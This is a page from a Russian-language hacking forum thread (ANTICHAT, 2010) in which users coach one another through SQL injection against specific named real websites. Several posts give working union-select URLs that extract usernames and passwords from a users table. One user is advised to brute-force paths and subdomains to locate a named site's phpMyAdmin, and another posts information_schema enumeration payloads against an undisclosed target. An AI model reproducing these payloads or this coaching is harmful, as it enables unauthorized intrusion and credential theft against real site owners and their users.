FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1108 из 2422

1108

Опции темы

Поиск в этой теме

Опции просмотра

20.01.2010, 16:12

GinTonic

Новичок

Регистрация: 18.12.2009

Сообщений: 13

Провел на форуме:
96637

Репутация: 0

что за инъекция:...

Цитата:

http://www.aaadtc.com/page.php?content=buy&cnum=21

подставляя кавычку

Цитата:

http://www.aaadtc.com/page.php?content=buy&cnum=21'

вылетает ошибка

Цитата:

Fatal error: Call to a member function execute() on a non-object in /home/.rhino/lsdtc/mydtcbusiness.com/clientsites/bigdeli_nader/data/buy.php on line 92

После подбирая количество полей нахожу нужное количество. Но принтабельного поля нет...

Цитата:

http://www.aaadtc.com/page.php?content=buy&cnum=21+and+1=0+union+select+ 1,2,3,4,5,6,7,8,9,10,11,12,13,14--

что это такое?

20.01.2010, 16:52

mff

Познавший АНТИЧАТ

Регистрация: 12.03.2008

Сообщений: 1,379

Провел на форуме:
5866479

Репутация: 1809

Отправить сообщение для mff с помощью ICQ

Подскажите, как найти адрес к phpmyadmin у http://centre.ru ?

20.01.2010, 16:58

AFoST

Members of Antichat - Level 5

Регистрация: 28.05.2007

Сообщений: 729

Провел на форуме:
5571194

Репутация: 1934

Отправить сообщение для AFoST с помощью ICQ

Цитата:

Сообщение от mff

Подскажите, как найти адрес к phpmyadmin у http://centre.ru ?

Брутить пути и субдомены =)
Если phpmyadmin там есть вообще...
billing.centre.ru это не пойдет?

__________________
Появляюсь редко. Важные дела в реале.

20.01.2010, 19:08

Ugol

Познающий

Регистрация: 26.12.2009

Сообщений: 66

Провел на форуме:
70384

Репутация: -25

Посмотри в (субдоменны ))

20.01.2010, 19:22

ElteRUS

Постоянный

Регистрация: 11.10.2007

Сообщений: 406

Провел на форуме:
7215020

Репутация: 1423

GinTonic,

http://www.aaadtc.com/page.php?content=buy&cnum=21+and+1=2+union+all+sel ect+1,2,password,4,5,6,7,8,9,10,11,username,13,14+ from+users--+

20.01.2010, 20:33

GinTonic

Новичок

Регистрация: 18.12.2009

Сообщений: 13

Провел на форуме:
96637

Репутация: 0

Цитата:

Сообщение от ElteRUS

GinTonic,

http://www.aaadtc.com/page.php?content=buy&cnum=21+and+1=2+union+all+sel ect+1,2,password,4,5,6,7,8,9,10,11,username,13,14+ from+users--+

а почему ноль на двойку заменил?
и почему в 3 и 12?

Последний раз редактировалось GinTonic; 20.01.2010 в 20:39..

20.01.2010, 21:09

ILYAtirtir

Участник форума

Регистрация: 25.04.2007

Сообщений: 176

Провел на форуме:
1957988

Репутация: 739

Отправить сообщение для ILYAtirtir с помощью ICQ

Цитата:

Сообщение от GinTonic

а почему ноль на двойку заменил?
и почему в 3 и 12?

смотри внимательней

Цитата:

http://www.aaadtc.com/page.php?content=buy&cnum=21+and+1=2+union+all+select+1,2,password,4,5, 6,7,8,9,10,11,username,13,14+from+users--+

20.01.2010, 22:56

GinTonic

Новичок

Регистрация: 18.12.2009

Сообщений: 13

Провел на форуме:
96637

Репутация: 0

Цитата:

Сообщение от ILYAtirtir

смотри внимательней

а для чего там all нужен?

20.01.2010, 21:36

Alf0x0ns

Новичок

Регистрация: 12.01.2010

Сообщений: 13

Провел на форуме:
61009

Репутация: 18

Для GinTonic:
1. Думаю для автора скули лутше так будет):

Код:

http://www.aaadtc.com/page.php?content=buy&cnum=-21+union+all+select+1,2,password,4,5,6,7,8,9,10,11,username,13,14+from+users--

2. Если убрать password и поставить 3 или 35656 то ты увидишь как сайт выведет эти числа, можно заменять любое число которое выводица на сайте при скуле, а уже пассворд и юсернаме это часть(столбцы) таблицы юсер для их вывода ты должен их знать!

Читай статьи на форуме))):
Ответы на часто задаваемые вопросы + линки на статьи по SQL/XSS/PHP-инклуд
SQL инъекция (в т.ч. и blind SQL)
Примеры:
Sql Инъекции

Последний раз редактировалось Alf0x0ns; 20.01.2010 в 22:31..

#10

21.01.2010, 01:10

Gidz

Познающий

Регистрация: 10.08.2009

Сообщений: 30

Провел на форуме:
282022

Репутация: 4

такой инъекшн, помогите раскрутить..
так все выводить, базу:таблицу:столбец

Код:

-133+UNION+SELECT+1,2,3,4,concat_ws(0x3a,table_schema,table_name,column_name),6,7,8,9,10+FROM+information_schema.columns+WHERE+table_name=0x75736572+LIMIT+0,1+--+

пытаюсь посмотреть данные, но ничего нет, тоесть вообще пусто, даже пропадают цифры, в принтабельных полях

Код:

-133+UNION+SELECT+1,2,3,4,concat_ws(0x3a,USERID,USERNAME,USERPASSWORD),6,7,8,9,10+FROM+basename.user+LIMIT+0,1+--+

но ведь должны быть какие-то данные, я пробовал в других таблицах смотреть, но тоже самое, не выводит ничего. Может что не так делаю? Или все таки пустые таблицы?
зы Не хотелось бы светить сайт, может кто по асикю подскажет?

зыы и еще может кто нить подскажет, что можно почитать по скулям через куки, а то ничего толком найти не могу ((

Последний раз редактировалось Gidz; 21.01.2010 в 01:21..

Страница 1108 из 2422

1108

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

ANTICHAT.XYZ